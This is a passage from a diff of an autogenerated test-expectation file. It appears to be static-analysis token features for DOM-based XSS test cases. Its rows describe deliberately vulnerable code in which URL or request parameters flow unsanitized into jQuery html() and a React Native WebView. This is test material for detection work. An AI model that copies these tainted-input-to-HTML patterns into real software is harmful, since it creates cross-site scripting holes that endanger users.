autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:16 | $('myId').html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | $('myId ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | $('myId ... target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | $('myId ... target) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | $('myId ... target) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | $('myId ... target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | exceptional return of $('myId ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | exceptional return of $('myId ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | exceptional return of $('myId ... target) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | exceptional return of $('myId ... target) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:57 | exceptional return of $('myId ... target) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:5:45:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:5:45:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:5:45:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14534,6 +105480,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:5:45:10 | 'myId' | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:5:45:10 | 'myId' | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:5:45:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:13:45:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:13:45:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:13:45:16 | html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:13:45:16 | html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:13:45:16 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:25 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:25 | sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:25 | sanitize | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:25 | sanitize | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:25 | sanitize | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:56 | sanitiz ... target | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:56 | sanitiz ... target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:56 | sanitiz ... target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14541,6 +105497,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:56 | sanitiz ... target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:56 | sanitiz ... target | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:18:45:56 | sanitiz ... target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:39 | sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:39 | sanitizeBad | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:39 | sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:39 | sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:39 | sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | exceptional return of sanitizeBad(target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | exceptional return of sanitizeBad(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | exceptional return of sanitizeBad(target) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | exceptional return of sanitizeBad(target) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | exceptional return of sanitizeBad(target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:41:45:46 | target | CalleeFlexibleAccessPath | sanitizeBad | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:41:45:46 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:41:45:46 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14548,12 +105519,62 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:41:45:46 | target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:41:45:46 | target | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:41:45:46 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:51:45:56 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:51:45:56 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:51:45:56 | target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:51:45:56 | target | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:51:45:56 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:1:1:0 | this | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:1:1:38 | import ... react'; | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:1:1:38 | import ... react'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:1:1:38 | import ... react'; | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:10:1:22 | createContext | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:31:1:37 | 'react' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:31:1:37 | 'react' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:1:31:1:37 | 'react' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:12:3:20 | MyContext | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:12:3:20 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:12:3:20 | MyContext | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:12:3:50 | MyConte ... null}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:12:3:50 | MyConte ... null}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:12:3:50 | MyConte ... null}) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:36 | createContext | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:36 | createContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:36 | createContext | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:50 | createC ... null}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:50 | createC ... null}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:50 | createC ... null}) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:50 | exceptional return of createC ... null}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:50 | exceptional return of createC ... null}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:24:3:50 | exceptional return of createC ... null}) | fileImports | react | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:38:3:49 | {root: null} | CalleeFlexibleAccessPath | createContext | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:38:3:49 | {root: null} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:38:3:49 | {root: null} | calleeImports | react | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:38:3:49 | {root: null} | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:38:3:49 | {root: null} | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:38:3:49 | {root: null} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:42 | root | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:42 | root | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:42 | root | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:48 | root: null | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:48 | root: null | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:48 | root: null | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:48 | root: null | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:48 | root: null | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-create-context.js:3:39:3:48 | root: null | fileImports | react | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:45:3:48 | null | CalleeFlexibleAccessPath | createContext | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:45:3:48 | null | InputAccessPathFromCallee | 0.root | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:45:3:48 | null | InputArgumentIndex | 0 | @@ -14562,6 +105583,79 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-create-context.js:3:45:3:48 | null | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:45:3:48 | null | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/react-create-context.js:3:45:3:48 | null | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:0 | this | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:1 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:1 | WebView | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:1 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:30 | import ... press'; | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:30 | import ... press'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:1:1:30 | import ... press'; | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:1:8:1:14 | express | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:1:21:1:29 | 'express' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:21:1:29 | 'express' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:1:21:1:29 | 'express' | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:2:1:2:39 | import ... ative'; | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:1:2:39 | import ... ative'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:1:2:39 | import ... ative'; | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:2:10:2:16 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:2:25:2:38 | 'react-native' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:25:2:38 | 'react-native' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:2:25:2:38 | 'react-native' | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:7 | app | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:19 | app | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:5:4:19 | app = express() | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:17 | express | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:19 | exceptional return of express() | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:4:11:4:19 | express() | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:6:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:6:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:6:3 | app | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:6:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:6:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:6:7 | app.get | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:10:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:10:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:10:2 | app.get ... T OK\\n}) | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:10:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:10:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:1:10:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:5:6:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:5:6:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:5:6:7 | get | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:6:9:6:20 | '/some/path' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/DomBasedXss/react-native.js:6:9:6:20 | '/some/path' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-native.js:6:9:6:20 | '/some/path' | calleeImports | express | @@ -14569,6 +105663,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-native.js:6:9:6:20 | '/some/path' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/react-native.js:6:9:6:20 | '/some/path' | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:6:9:6:20 | '/some/path' | receiverName | app | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | WebView | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | WebView | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | WebView | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | this | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:6:22 | this | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | 'arguments' object of anonymous function | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | exceptional return of anonymous function | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | exceptional return of anonymous function | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | functio ... OT OK\\n} | calleeImports | express | @@ -14576,6 +105690,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | functio ... OT OK\\n} | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | return of anonymous function | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:23:10:1 | return of anonymous function | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 